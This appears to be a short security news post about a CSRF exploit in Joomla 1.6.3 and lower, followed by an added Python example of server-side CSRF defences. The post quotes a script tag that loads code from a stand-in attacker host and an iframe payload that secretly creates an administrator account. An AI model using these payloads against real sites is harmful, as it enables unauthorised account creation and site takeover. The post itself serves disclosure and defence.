CSRF Exploit for Joomla 1.6.3 or Lower | SecTechno
A new exploit has been published that targets Joomla 1.6.3 and lower versions. The vulnerability allows an attacker to create a specially crafted URL that executes arbitrary script code in the victim's browser.
A cross-site request forgery (XSRF or CSRF) attack abuses the trust relationship between a web application and its authenticated users to force those users to commit arbitrary sensitive transactions on behalf of an attacker.
The attack scenario is as follows: the attacker creates a malicious HTML page on a system under their control that includes a JavaScript file, joom163.js:
<script src="http://attacker.com/joom163.js"></script>
The JavaScript contains the following code:
document.write('<iframe id="iframe" src="http://victim.com/administrator/index.php?option=com_users&view=user&layout=edit" width="0" height="0" style="visibility: hidden;" onload="read()"></iframe>');
When an authenticated user of the vulnerable site visits the page, the JavaScript runs without their knowledge and sends an HTTP GET request to the server that creates a root account (username = "Haxx", password = "test123"). Because the request comes from the victim's own browser, all cookies associated with that domain, port and path are automatically attached to the HTTP header and sent with the request.
To correct the flaw, upgrade to Joomla! 1.6.4 or higher.
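The scenario above works because the session cookie alone is accepted as proof of intent. The following server-side check is an added example, not code from Joomla or from the original article; the function names, the csrf_token field and the request layout are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_KEY = secrets.token_bytes(32)  # per-deployment secret (constructed here)
SITE_ORIGIN = "http://victim.com"     # host name reused from the article's scenario

# Response headers that stop admin pages from loading inside a hidden iframe.
ANTI_FRAMING_HEADERS = {
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "frame-ancestors 'none'",
}

def issue_token(session_id):
    """Token bound to one session; the server embeds it in every admin form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def same_origin(header_value):
    """True only if an Origin or Referer value points at our own site."""
    if not header_value:
        return False
    parts = urlsplit(header_value)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN

def check_admin_request(method, state_changing, session_id, headers, form):
    """Return (allowed, reason). The session cookie is assumed valid already:
    the browser attaches it to forged requests too, so it proves nothing."""
    if not state_changing:
        return True, "read-only"
    if method != "POST":
        return False, "state change over non-POST"
    if not same_origin(headers.get("Origin") or headers.get("Referer")):
        return False, "cross-site source"
    supplied = form.get("csrf_token", "")
    expected = issue_token(session_id)
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "bad or missing token"
    return True, "ok"
```

A page on another origin cannot read the per-session token, so a forged request fails the last check even when it arrives with the victim's cookies.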
